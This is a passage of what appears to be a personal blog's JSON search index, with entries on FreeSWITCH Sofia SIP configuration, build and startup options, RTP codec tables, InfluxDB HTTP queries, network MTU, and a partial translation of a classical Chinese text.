sofia.conf.xml:\u0026lt;global_settings\u0026gt;\u0026hellip;\u0026hellip;\u0026lt;/global_settings\u0026gt;\nand the following to the sip profile xml file:\u0026hellip;\u0026hellip;\u0026hellip;\u0026hellip;\nProfile Configurations Track Call ACL You can restrict access by IP address for either REGISTERs or INVITEs (or both) by using the following options in the sofia profile.See ACL for other access controlsSee acl.conf.xml for list configuration Disabling Hold Disable all calls on this profile from putting the call on hold:\nSee also: rtp_disable_hold variable Using A Single Domain For All Registrations You can force all registrations in a particular profile to use a single domain. In other words, you can ignore the domain in the SIP message. You will need to modify several sofia profile settings. challenge realm auto_from - uses the from field as the value for the SIP realm. auto_to - uses the to field as the value for the SIP realm. - you can input any value to use for the SIP realm. force-register-domain Preference Weight Transport Port Address================================================================================1 0.500 udp 5060 74.51.38.151 0.500 tcp 5060 74.51.38.15 Flushing Inbound Registrations From time to time, you may need to kill a registration.You can kill a registration from the CLI, or anywhere that accepts API commands with a command similar to the following:sofia profile \u0026lt;profile_name_here\u0026gt; flush_inbound_reg [optional_callid] Dial out of a gateway Basic form:sofia/gateway//\u0026lt;number_to_dial\u0026gt;Example 1:sofia/gateway/asterlink/18005551212gateway: is a keyword and not a \u0026ldquo;gateway\u0026rdquo; name. It has special meaning and tells the stack which credentials to use when challenged for the call. is the actual name of the gateway through which you want to send the call\nYour available gateways (usually configured in conf/sip_profiles/external/*.xml) will show up in sofia status:freeswitch#\u0026gt; sofia status\nName Type Data State=================================================================================================default profile sip:mod_sofia@2.3.4.5:5060 RUNNING (2)mygateway gateway sip:username@1.2.3.4 NOREGphonebooth.example.com alias default ALIASED=================================================================================================1 profile 1 alias Modifying the To: header You can override the To: header by appending ^.Example 1:sofia/foo/user%192.168.1.1^101@$${domain}\nSpecifying SIP Proxy With fs_path You can route a call through a specific SIP proxy by using the \u0026ldquo;fs_path\u0026rdquo; directive. Example:sofia/foo/user@that.domain;fs_path=sip:proxy.this.domain Safe SIP URI Formatting As of commit https://freeswitch.org/stash/projects/FS/repos/freeswitch/commits/76370f4d1767bb0dcf828a3d6cde6e015b2cfa03 the User part of the SIP URI has been \u0026ldquo;safely\u0026rdquo; encoded in the case where spaces or other special characters appear.\nChannel Variables Adding Request Headers You can add arbitrary headers to outbound SIP calls by prefixing the string \u0026lsquo;sip_h_\u0026rsquo; to any channel variable, for example:Note that for BYE requests, you will need to use the prefix \u0026lsquo;sip_bye_h_\u0026rsquo; on the channel variable.\nWhile not required, you should prefix your headers with \u0026ldquo;X-\u0026rdquo; to avoid issues with interoperability with other SIP stacks.All inbound SIP calls will install any X- headers into local variables.This means you can easily bridge any X- header from one FreeSWITCH instance to another.To access the header above on a 2nd box, use the channel variable ${sip_h_X-Answer}It is important to note that the syntax ${sip_h_custom-header} can\u0026rsquo;t be used to retrieve any custom header not starting with X-.It is because Sofia only reads and puts into variables custom headers starting with X-.\nAdding Response Headers There are three types of response header prefixes that can be set:\nResponse headersip_rh_ Provisional response headersip_ph_ Bye response headersip_bye_h_ Each prefix will exclusively add headers for their given types of requests - there is no \u0026ldquo;global\u0026rdquo; response header prefix that will add a header to all response messages.For example:\nAdding Custom Headers For instance, you may need P-Charge-Info to append to your INVITE header, you may do as follows:Then, you would see it in SIP message:INVITE sip:19099099099@1.2.3.4 SIP/2.0Via: SIP/2.0/UDP 5.6.7.8:5080;rport;branch=z9hG4bKyg61X9v3gUD4gMax-Forwards: 69From: \u0026ldquo;DJB\u0026rdquo; sip:2132132132@5.6.7.8;tag=XQKQ322vQF5gKTo: sip:19099099099@1.2.3.4Call-ID: b6c776f6-47ed-1230-0085-000f1f659e58CSeq: 30776798 INVITEContact: sip:mod_sofia@5.6.7.8:5080User-Agent: FreeSWITCH-mod_sofia/1.2.0-rc2+git~20120713T162602Z~0afd7318bd+unclean~20120713T184029ZAllow: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, UPDATE, INFO, REGISTER, REFER, NOTIFYSupported: timer, precondition, path, replacesAllow-Events: talk, hold, conference, referContent-Type: application/sdpContent-Disposition: sessionContent-Length: 229P-Charge-Info: sip:2132132132@5.6.7.8;npi=0;noa=3X-FS-Support: update_display,send_info.Remote-Party-ID: \u0026ldquo;DJB\u0026rdquo; sip:2132132132@5.6.7.8;party=calling;screen=yes;privacy=off Strip Individual SIP Headers Sometimes a SIP provider will add extra header information. Most of the time they do that for their own use (tracking calls). But that extra information can cause a lot of problems. For example: I get a call from the PSTN via a DID provider (provider1). Since im not in the office the call gets bridged to my cell phone (provider2). Provider1 add\u0026rsquo;s extra information to the sip packet like displayed below:X-voipnow-did: 01234567890X-voipnow-extension: 987654321\u0026hellip;In some scenario, we bridge this call directly to provider2 the calls get dropped since provider2 doesnt accept the X-voipnow header, so we have to strip off those SIP headers.To strip them off, use the application UNSET in the dialplan (the inverse of SET):\u0026hellip; Strip All custom SIP Headers If you wish to strip all custom headers while keeping only those defined in dialplan:\u0026hellip; Additional Channel variables Additional variables may also be set to influence the way calls are handled by sofia.For example, contacts can be filtered by setting the \u0026lsquo;sip_exclude_contact\u0026rsquo; variable. Example:Or you can perform SIP Digest authorization on outgoing calls by setting sip_auth_username and sip_auth_password variables to avoid using Gateways to authenticate. Example:Changing the SIP Contact user FreeSWITCH normally uses mod_sofia@ip:port for the internal SIP contact. To change this to foo@ip:port, there is a variable, sip_contact_user:{sip_contact_user=foo}sofia/my_profile/1234@192.168.0.1;transport=tcp sip_renegotiate_codec_on_reinvite true|false sip_recovery_break_rfc true|false Transcoding Issues G729 and G723 will not let you transcode because of licensing issues. Calls will fail if for example originating endpoint has set G729 with higher priority and receiving endpoint has G723 with highest priority. The logic is to fail the call rather than attempt to find a codec match. If you are having issues due to transcoding you may disable transcoding and both endpoints will negotiate the compatible codec rather than just fail the call.disable-transcoding will take the preferred codec from the inbound leg of your call and only offer that codec on the outbound leg.Add the following command along with to your sofia profile\nExample:\nCustom Events The following are events that can be subscribed to via Event Socket\nRegistration sofia::register* sofia::pre_register* sofia::register_attempt* sofia::register_failure* sofia::unregister - explicit unregister calls* sofia::expire - when a user registration expires Gateways sofia::gateway_add* sofia::gateway_delete* sofia::gateway_state - when a gateway is detected as down or back up Call recovery sofia::recovery_send* sofia::recovery_recv* sofia::recovery_recovered Other sofia::notify_refer* sofia::reinvite* sofia::error FAQ Does it use UDP or TCP? By default it uses both, but you can add ;transport=tcp to the Sofia URL to force it to use TCP.For example:sofia/profile/foo@bar.com;transport=tcpAlso there is a parameter in the gateway config:That will cause it to use the TCP transport for the registration and all subsequent SIP messages.Not sure if this is needed or what it does, but the following can also be used in gateway settings:\n","permalink":"https://wdd.js.org/freeswitch/sofia-stack/","summary":"Sofia is a SIP stack used by FreeSWITCH. When you see \u0026ldquo;sofia\u0026rdquo; anywhere in your configuration, think \u0026ldquo;This is SIP stuff.\u0026rdquo; It takes a while to master it all, so please be patient with yourself. SIP is a crazy protocol and it will make you crazy too if you aren\u0026rsquo;t careful. Read on for information on setting up SIP/Sofia in your FreeSWITCH configuration.\nmod_sofia exposes the Sofia API and sets up the FreeSWITCH SIP endpoint.","title":"Sofia SIP Stack"},{"content":" make clean - Cleans the build environment make current - Cleans build environment, performs an git update, then does a make install make core_install (or make install_core) - Recompiles and installs just the core files. Handy if you are working on a core file and want to recompile without doing the whole shebang. make mod_XXXX-install - Recompiles and installs just a single module. Here are some examples: make mod_openzap-install make mod_sofia-install make mod_lcr-install make samples - This will not replace your configuration. This will instead make the default extensions and dialplan to run the basic configuration of FreeSWITCH. ","permalink":"https://wdd.js.org/freeswitch/compile-fs/","summary":"make clean - Cleans the build environment make current - Cleans build environment, performs an git update, then does a make install make core_install (or make install_core) - Recompiles and installs just the core files. Handy if you are working on a core file and want to recompile without doing the whole shebang. make mod_XXXX-install - Recompiles and installs just a single module. Here are some examples: make mod_openzap-install make mod_sofia-install make mod_lcr-install make samples - This will not replace your configuration.","title":"编译FS"},{"content":"\n运行fs 前台运行 freeswitch 后台运行 freeswich -nc 参数列表 These are the optional arguments you can pass to freeswitch:\nFreeSWITCH startup switches\n-waste -- allow memory waste -no-auto-stack -- don\u0026#39;t adjust thread stack size -core -- dump cores -help -- print this message -version -- print the version and exit -rp -- enable high(realtime) priority settings -lp -- enable low priority settings -np -- enable normal priority settings (system default) -vg -- run under valgrind -nosql -- disable internal SQL scoreboard -heavy-timer -- Heavy Timer, possibly more accurate but at a cost -nonat -- disable auto NAT detection -nonatmap -- disable auto NAT port mapping -nocal -- disable clock calibration -nort -- disable clock clock_realtime -stop -- stop freeswitch -nc -- no console and run in background -ncwait -- no console and run in background, but wait until the system is ready before exiting (implies -nc) -c -- output to a console and stay in the foreground (default behavior) UNIX-like only -nf -- no forking -u [user] -- specify user to switch to -g [group] -- specify group to switch to -ncwait -- do not output to a console and background but wait until the system is ready before exiting (implies -nc) Windows-only -service [name] \u0026ndash; start freeswitch as a service, cannot be used if loaded as a console app-install [name] \u0026ndash; install freeswitch as a service, with optional service name-uninstall \u0026ndash; remove freeswitch as a service-monotonic-clock \u0026ndash; use monotonic clock as timer source\nFile locations -base [basedir] \u0026ndash; alternate prefix directory-conf [confdir] \u0026ndash; alternate directory for FreeSWITCH configuration files-log [logdir] \u0026ndash; alternate directory for logfiles-run [rundir] \u0026ndash; alternate directory for runtime files-db [dbdir] \u0026ndash; alternate directory for the internal database-mod [moddir] \u0026ndash; alternate directory for modules-htdocs [htdocsdir] \u0026ndash; alternate directory for htdocs-scripts [scriptsdir] \u0026ndash; alternate directory for scripts-temp [directory] \u0026ndash; alternate directory for temporary files-grammar [directory] \u0026ndash; alternate directory for grammar files-recordings [directory] \u0026ndash; alternate directory for recordings-storage [directory] \u0026ndash; alternate directory for voicemail storage-sounds [directory] \u0026ndash; alternate directory for sound filesIf you set the file locations of any one of -conf, -log, or -db you must set all three. File Paths A handy method to determine where FreeSWITCH™ is currently looking for files (in linux):Method for showing FS paths\nbash\u0026gt; fs_cli -x \u0026#39;global_getvar\u0026#39;| grep _dir base_dir=/usrrecordings_dir=/var/lib/freeswitch/recordingssounds_dir=/usr/share/freeswitch/soundsconf_dir=/etc/freeswitchlog_dir=/var/log/freeswitchrun_dir=/var/run/freeswitchdb_dir=/var/lib/freeswitch/dbmod_dir=/usr/lib/freeswitch/modhtdocs_dir=/usr/share/freeswitch/htdocsscript_dir=/usr/share/freeswitch/scriptstemp_dir=/tmpgrammar_dir=/usr/share/freeswitch/grammarfonts_dir=/usr/share/freeswitch/fontsimages_dir=/var/lib/freeswitch/imagescerts_dir=/etc/freeswitch/tlsstorage_dir=/var/lib/freeswitch/storagecache_dir=/var/cache/freeswitchdata_dir=/usr/share/freeswitchlocalstate_dir=/var/lib/freeswitchArgument CautionsSetting some arguments may affect behavior in unexpected ways. The following list contains known side-effects of setting various command line arguments.* nosql - Setting nosql completely disables the use of coreDB which means you will not have show channels, show calls, tab completion, or anything else that is stored in the coreDB.\n","permalink":"https://wdd.js.org/freeswitch/command-line/","summary":"运行fs 前台运行 freeswitch 后台运行 freeswich -nc 参数列表 These are the optional arguments you can pass to freeswitch:\nFreeSWITCH startup switches\n-waste -- allow memory waste -no-auto-stack -- don\u0026#39;t adjust thread stack size -core -- dump cores -help -- print this message -version -- print the version and exit -rp -- enable high(realtime) priority settings -lp -- enable low priority settings -np -- enable normal priority settings (system default) -vg -- run under valgrind -nosql -- disable internal SQL scoreboard -heavy-timer -- Heavy Timer, possibly more accurate but at a cost -nonat -- disable auto NAT detection -nonatmap -- disable auto NAT port mapping -nocal -- disable clock calibration -nort -- disable clock clock_realtime -stop -- stop freeswitch -nc -- no console and run in background -ncwait -- no console and run in background, but wait until the system is ready before exiting (implies -nc) -c -- output to a console and stay in the foreground (default behavior) UNIX-like only -nf -- no forking -u [user] -- specify user to switch to -g [group] -- specify group to switch to -ncwait -- do not output to a console and background but wait until the system is ready before exiting (implies -nc) Windows-only -service [name] \u0026ndash; start freeswitch as a service, cannot be used if loaded as a console app-install [name] \u0026ndash; install freeswitch as a service, with optional service name-uninstall \u0026ndash; remove freeswitch as a service-monotonic-clock \u0026ndash; use monotonic clock as timer source","title":"fs 命令行"},{"content":" Item Reload Command Notes XML Dialplan reloadxml Run each time you edit XML dial file(s) ACLs reloadacl Edit acl.conf.xml first Voicemail reload mod_voicemail Edit voicemail.conf.xml first Conference reload mod_conference Edit conference.conf.xml first Add Sofia Gateway sofia profile rescan Less intrusive - no calls dropped Remove Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt; Less intrusive - no calls dropped Restart Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt;sofia profile rescan Less intrusive - no calls dropped Add/remove Sofia Gateway sofia profile restart More intrusive - all profile calls dropped Local Stream see Mod_local_stream Edit localstream.conf.xml first Update a lua file nothing necessary file is loaded from disk each time it is run Update LCR SQL table nothing necessary SQL query is run for each new call Update LCR options reload mod_lcr Edit lcr.conf.xml first Update CID Lookup Options reload mod_cidlookup Edit cidlookup.conf.xml first Update JSON CDR Options reload mod_json_cdr Edit json_cdr.conf.xml first Update XML CDR Options reload mod_xml_cdr Edit xml_cdr.conf.xml first Update XML CURL Server Response nothing, unless using cache ","permalink":"https://wdd.js.org/freeswitch/reload/","summary":"Item Reload Command Notes XML Dialplan reloadxml Run each time you edit XML dial file(s) ACLs reloadacl Edit acl.conf.xml first Voicemail reload mod_voicemail Edit voicemail.conf.xml first Conference reload mod_conference Edit conference.conf.xml first Add Sofia Gateway sofia profile rescan Less intrusive - no calls dropped Remove Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt; Less intrusive - no calls dropped Restart Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt;sofia profile rescan Less intrusive - no calls dropped Add/remove Sofia Gateway sofia profile restart More intrusive - all profile calls dropped Local Stream see Mod_local_stream Edit localstream.","title":"fs reload命令"},{"content":"v=0 o=WMSWMS 1562204406 1562204407 IN IP4 192.168.40.79 s=WMSWMS c=IN IP4 192.168.40.79 t=0 0 m=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 a=rtpmap:101 telephone-event/8000 a=fmtp:101 0-16 a=ptime:20 上面的SDP协议,我们只关注媒体编码部分,其中\nm=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 m字段audio说明是音频 31114是rtp的发送端口,一般rtp端口都是偶数,偶数后面的一个奇数端口是给rtcp端口的 0 8 9 101就是媒体编码,每个整数代表一个编码,其中96以下的是都是用IANA规定的,可以不用下面的rtpmap字段去指定,96以上的属于动态编码,需要用rtpmap去指定 上面是整个编码表,我们只需要记住几个就可以:\n0 PCMU/8000 3 GSM/8000 8 PCMA/8000 9 G722/8000 18 G729/8000 102 DTMF/8000 a=rtpmap:101 telephone-event/8000a=fmtp:101 0-16上面的字段描述的是DTMP的支持。DTMF标准,所有SIP实体至少支持0-15的DTMF事件。\n0-9是数字 10是* 11是# 12-15对应A,B,C,D 参考 https://www.iana.org/assignments/rtp-parameters/rtp-parameters.xhtml https://www.3cx.com/blog/voip-howto/sdp-voip2/ https://www.3cx.com/blog/voip-howto/sdp-voip/ ","permalink":"https://wdd.js.org/opensips/ch4/codec-table/","summary":"v=0 o=WMSWMS 1562204406 1562204407 IN IP4 192.168.40.79 s=WMSWMS c=IN IP4 192.168.40.79 t=0 0 m=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 a=rtpmap:101 telephone-event/8000 a=fmtp:101 0-16 a=ptime:20 上面的SDP协议,我们只关注媒体编码部分,其中\nm=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 m字段audio说明是音频 31114是rtp的发送端口,一般rtp端口都是偶数,偶数后面的一个奇数端口是给rtcp端口的 0 8 9 101就是媒体编码,每个整数代表一个编码,其中96以下的是都是用IANA规定的,可以不用下面的rtpmap字段去指定,96以上的属于动态编码,需要用rtpmap去指定 上面是整个编码表,我们只需要记住几个就可以:\n0 PCMU/8000 3 GSM/8000 8 PCMA/8000 9 G722/8000 18 G729/8000 102 DTMF/8000 a=rtpmap:101 telephone-event/8000a=fmtp:101 0-16上面的字段描述的是DTMP的支持。DTMF标准,所有SIP实体至少支持0-15的DTMF事件。\n0-9是数字 10是* 11是# 12-15对应A,B,C,D 参考 https://www.","title":"rtp编码表"},{"content":" 查询某个字段 q=SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T00:10:00Z\u0026#39; 正常查询结果,下面是例子,和上面的sql没有关系。\n:::warning 时间必须用单引号括起来,不能用双引号,格式也必须是YYYY-MM-DDTHH:MM:SSZ :::\n{ \u0026#34;results\u0026#34;: [ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;value\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 2 ], [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 0.55 ], [ \u0026#34;2015-06-11T20:46:02Z\u0026#34;, 0.64 ] ] } ] } ] } 如果有报错,数组项中的某一个会有error属性,值为报错原因\n{ \u0026#34;results\u0026#34;:[ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;error\u0026#34;: \u0026#34;invalid operation: time and *influxql.StringLiteral are not compatible\u0026#34; } ] } 批次查询 语句之间用分号隔开\nq=SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T00:10:00Z\u0026#39;;SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-09T00:10:00Z\u0026#39; 返回结果中的statement_id就表示对应的语句\n{ \u0026#34;results\u0026#34;: [ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;value\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 2 ], [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 0.55 ], [ \u0026#34;2015-06-11T20:46:02Z\u0026#34;, 0.64 ] ] } ] }, { \u0026#34;statement_id\u0026#34;: 1, \u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;count\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;1970-01-01T00:00:00Z\u0026#34;, 3 ] ] } ] } ] } 查询结果 按分钟求平均值 q=SELECT MEAN(real_used_size) FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T03:10:00Z\u0026#39; GROUP BY time(1m) 其他查询参数 chunked=[true | db=\u0026lt;database_name\u0026gt; epoch=[ns,u,µ,ms,s,m,h] p= pretty=true q= u= 参考教程 报错处理 https://docs.influxdata.com/influxdb/v1.7/troubleshooting/errors/ 数据查询 https://docs.influxdata.com/influxdb/v1.6/guides/querying_data/ 函数 https://docs.influxdata.com/influxdb/v1.7/query_language/functions/ ","permalink":"https://wdd.js.org/posts/2019/12/pv5xgz/","summary":"查询某个字段 q=SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T00:10:00Z\u0026#39; 正常查询结果,下面是例子,和上面的sql没有关系。\n:::warning 时间必须用单引号括起来,不能用双引号,格式也必须是YYYY-MM-DDTHH:MM:SSZ :::\n{ \u0026#34;results\u0026#34;: [ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;value\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 2 ], [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 0.55 ], [ \u0026#34;2015-06-11T20:46:02Z\u0026#34;, 0.64 ] ] } ] } ] } 如果有报错,数组项中的某一个会有error属性,值为报错原因\n{ \u0026#34;results\u0026#34;:[ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;error\u0026#34;: \u0026#34;invalid operation: time and *influxql.StringLiteral are not compatible\u0026#34; } ] } 批次查询 语句之间用分号隔开","title":"influxdb HTTP 接口学习"},{"content":"sngrep长时间抓包会导致内存堆积,所以sngrep只适合短时间分析抓包,长时间抓包需要用tcp-dump\n","permalink":"https://wdd.js.org/opensips/tools/tcp-dump/","summary":"sngrep长时间抓包会导致内存堆积,所以sngrep只适合短时间分析抓包,长时间抓包需要用tcp-dump","title":"tcp-dump"},{"content":"最大传输单元MTU 以太网和802.3对数据帧的长度有个限制,其最大长度分别是1500和1942。链路层的这个特性称作MTU, 最大传输单元。不同类型的网络大多数都有一个限制。\n如果IP层的数据报的长度比链路层的MTU大,那么IP层就需要分片,每一片的长度要小于MTU。\n使用netstat -in可以打印出网络接口的MTU\n➜ ~ netstat -in Kernel Interface table Iface MTU Met RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg eth2 1500 0 1078767768 2264 689 0 1297577913 0 0 0 BMRU lo 16436 0 734474 0 0 0 734474 0 0 0 LRU 路径MTU 信息经过多个网络时,不同网络可能会有不同的MTU,而其中最小的一个MTU, 称为路径MTU。\n","permalink":"https://wdd.js.org/network/xwuvyr/","summary":"最大传输单元MTU 以太网和802.3对数据帧的长度有个限制,其最大长度分别是1500和1942。链路层的这个特性称作MTU, 最大传输单元。不同类型的网络大多数都有一个限制。\n如果IP层的数据报的长度比链路层的MTU大,那么IP层就需要分片,每一片的长度要小于MTU。\n使用netstat -in可以打印出网络接口的MTU\n➜ ~ netstat -in Kernel Interface table Iface MTU Met RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg eth2 1500 0 1078767768 2264 689 0 1297577913 0 0 0 BMRU lo 16436 0 734474 0 0 0 734474 0 0 0 LRU 路径MTU 信息经过多个网络时,不同网络可能会有不同的MTU,而其中最小的一个MTU, 称为路径MTU。","title":"2 链路层"},{"content":"原文 大夫登徒子侍于楚王,短宋玉曰:\u0026ldquo;玉为人体貌闲丽,口多微辞,又性好色。愿王勿与出入后宫。\u0026rdquo; 王以登徒子之言问宋玉。\n玉曰:\u0026ldquo;体貌闲丽,所受于天也;口多微辞,所学于师也;至于好色,臣无有也。\u0026rdquo;\n王曰:\u0026ldquo;子不好色,亦有说乎?有说则止,无说则退。\u0026rdquo;\n玉曰:\u0026ldquo;天下之佳人莫若楚国,楚国之丽者莫若臣里,臣里之美者莫若臣东家之子。东家之子,增之一分则太长,减之一分则太短 ;著粉则太白,施朱则太赤;眉如翠羽,肌如白雪;腰如束素,齿如含贝;嫣然一笑,惑阳城,迷下蔡。然此女登墙窥臣三年,至今未许也。登徒子则不然:其妻蓬头挛耳,齞唇历齿,旁行踽偻,又疥且痔。登徒子悦之,使有五子。王孰察之,谁为好色者矣。\u0026rdquo;\n是时,秦章华大夫在侧,因进而称曰:\u0026ldquo;今夫宋玉盛称邻之女,以为美色,愚乱之邪;臣自以为守德,谓不如彼矣。且夫南楚穷巷之妾,焉足为大王言乎?若臣之陋,目所曾睹者,未敢云也。\u0026rdquo;\n王曰:\u0026ldquo;试为寡人说之。\u0026rdquo;\n大夫曰:\u0026ldquo;唯唯。臣少曾远游,周览九土,足历五都。出咸阳、熙邯郸,从容郑、卫、溱 、洧之间 。是时向春之末 ,迎夏之阳,鸧鹒喈喈,群女出桑。此郊之姝,华色含光,体美容冶,不待饰装。臣观其丽者,因称诗曰:\u0026lsquo;遵大路兮揽子祛\u0026rsquo;。赠以芳华辞甚妙。于是处子怳若有望而不来,忽若有来而不见。意密体疏,俯仰异观;含喜微笑,窃视流眄。复称诗曰:\u0026lsquo;寐春风兮发鲜荣,洁斋俟兮惠音声,赠我如此兮不如无生。\u0026lsquo;因迁延而辞避。盖徒以微辞相感动。精神相依凭;目欲其颜,心顾其义,扬《诗》守礼,终不过差,故足称也。\u0026rdquo;\n于是楚王称善,宋玉遂不退。\n我来翻译 士大夫登徒先生站在楚王身旁,评论宋玉,说:宋玉这小伙子,长得很帅,但是非常八卦,而且好色,建议您不要让他进入后宫。\n楚王用登徒先生的话问宋玉。\n宋玉争辩说:我长得帅,这是父母生得好。我比较八卦,是因为我学识广博,口才好。至于说我好色,那是没有的事情。\n宋玉接着说:“天下的美女啊,没有比得上楚国的。楚国的美女,没有比得上臣里这个地方的。臣里的美女,没有比得上我邻居家的那个姑娘。”\n“那个姑娘,长得再高一点就太高了,长得再低一点就太低了。擦了粉底的话就太白,擦了腮红就太红了。眉毛像黑色的羽毛,肌肤像白雪一样。腰非常细,牙齿像贝壳一样白皙。”\n“她一笑,阳城和下蔡这两个地方的所有男人,都会被迷住。”\n“然而这个美女,天天登上我家的墙头偷窥我三年了,我至今都没有答应她让她作为我女朋友。”\n“登徒先生则不然,他老婆蓬头垢面、兔唇龅牙、走路佝偻、还长痔疮。但是登徒先生却非常喜欢她,和她生了5个孩子。大王你仔细想想,谁才是真正的好色?”\n","permalink":"https://wdd.js.org/posts/2019/11/wkyqnl/","summary":"原文 大夫登徒子侍于楚王,短宋玉曰:\u0026ldquo;玉为人体貌闲丽,口多微辞,又性好色。愿王勿与出入后宫。\u0026rdquo; 王以登徒子之言问宋玉。\n玉曰:\u0026ldquo;体貌闲丽,所受于天也;口多微辞,所学于师也;至于好色,臣无有也。\u0026rdquo;\n王曰:\u0026ldquo;子不好色,亦有说乎?有说则止,无说则退。\u0026rdquo;\n玉曰:\u0026ldquo;天下之佳人莫若楚国,楚国之丽者莫若臣里,臣里之美者莫若臣东家之子。东家之子,增之一分则太长,减之一分则太短 ;著粉则太白,施朱则太赤;眉如翠羽,肌如白雪;腰如束素,齿如含贝;嫣然一笑,惑阳城,迷下蔡。然此女登墙窥臣三年,至今未许也。登徒子则不然:其妻蓬头挛耳,齞唇历齿,旁行踽偻,又疥且痔。登徒子悦之,使有五子。王孰察之,谁为好色者矣。\u0026rdquo;\n是时,秦章华大夫在侧,因进而称曰:\u0026ldquo;今夫宋玉盛称邻之女,以为美色,愚乱之邪;臣自以为守德,谓不如彼矣。且夫南楚穷巷之妾,焉足为大王言乎?若臣之陋,目所曾睹者,未敢云也。\u0026rdquo;\n王曰:\u0026ldquo;试为寡人说之。\u0026rdquo;\n大夫曰:\u0026ldquo;唯唯。臣少曾远游,周览九土,足历五都。出咸阳、熙邯郸,从容郑、卫、溱 、洧之间 。是时向春之末 ,迎夏之阳,鸧鹒喈喈,群女出桑。此郊之姝,华色含光,体美容冶,不待饰装。臣观其丽者,因称诗曰:\u0026lsquo;遵大路兮揽子祛\u0026rsquo;。赠以芳华辞甚妙。于是处子怳若有望而不来,忽若有来而不见。意密体疏,俯仰异观;含喜微笑,窃视流眄。复称诗曰:\u0026lsquo;寐春风兮发鲜荣,洁斋俟兮惠音声,赠我如此兮不如无生。\u0026lsquo;因迁延而辞避。盖徒以微辞相感动。精神相依凭;目欲其颜,心顾其义,扬《诗》守礼,终不过差,故足称也。\u0026rdquo;\n于是楚王称善,宋玉遂不退。\n我来翻译 